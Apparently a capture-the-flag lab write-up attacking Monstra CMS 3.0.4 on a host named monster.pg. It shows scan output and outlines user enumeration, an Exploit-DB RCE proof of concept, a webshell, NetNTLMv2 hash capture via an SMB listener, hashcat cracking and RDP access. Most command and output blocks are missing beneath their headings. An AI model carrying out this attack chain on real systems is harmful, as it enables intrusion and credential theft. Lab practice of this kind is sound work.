Monstra CMS

Monstra CMS 3.0.4 can expose user enumeration and authenticated RCE paths. On Windows/XAMPP targets, successful RCE may execute as the local web user rather than a low-privileged service account.

Discovery

Useful indicators:

80/tcp open  http  Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.3.10)
|_http-title: Mike Wazowski

Nmap HTTP enum may reveal a blog path:

http-enum:
  /blog/: Blog

Add the discovered virtual host before browsing:

TARGET monster.pg

Monstra indicators:

http://monster.pg/blog/
Welcome to your new Monstra powered website.

http://monster.pg/blog/admin/
(c) 2012 - 2016 Monstra - Version 3.0.4

Nuclei may also identify it:

[metatag-cms] Powered by Monstra 3.0.4
[monstracms-detect] 3.0.4
[monstra-admin-panel] /blog/admin/index.php

User Enumeration

Monstra user pages may be public:

Observed users:

Useful profile details:

Build a small target-specific wordlist from the main site and blog:

Working credential:

Authenticated RCE

References:

Run the working Exploit-DB 52038 PoC:

Successful output:

Use the webshell:

Successful execution context:

Credential Files

The Monstra user database is stored under the web root:

Useful fields include login, password, email, role, and hash.

Post-Exploitation

From the Monstra command shell, force the current Windows user to authenticate to an attacker SMB listener:

Crack the captured NetNTLMv2 hash with Hashcat mode 5600. In the observed path, the cracked credential was:

Use the credential for RDP access, then continue local Windows privilege escalation from an interactive session.